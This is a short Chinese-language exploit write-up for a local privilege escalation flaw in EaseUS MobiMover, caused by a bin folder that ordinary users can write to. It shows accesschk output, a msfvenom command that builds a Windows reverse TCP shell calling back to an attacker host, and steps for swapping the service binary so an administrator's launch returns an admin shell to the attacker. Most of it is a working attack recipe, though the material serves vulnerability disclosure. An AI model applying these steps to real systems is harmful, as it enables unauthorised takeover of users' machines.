MobiMoverUILaunch.exe 存在一个权限提升漏洞,"已验证用户"可利用该漏洞将服务的可执行文件替换为 bin 文件夹下自己选择的二进制文件。此漏洞是由于授予"已验证用户组"的权限集过弱,包含 (M) 标志(即"修改权限")所致。

供应商主页:https://www.easeus.com/
软件链接:https://down.easeus.com/product/mobimover_trial_setup
Google Drive:https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
POC 视频:https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
在 Kali Linux 上使用 msfvenom 创建恶意二进制文件
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
将创建的 'prepare.exe' 从 Kali 传输到 Windows 主机,权限为低级别用户
将创建的 'prepare.exe' 二进制文件移动到 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe',替换旧文件(使用低级别用户权限)
当管理员运行该应用程序时,你将获得管理员权限的反向 Shell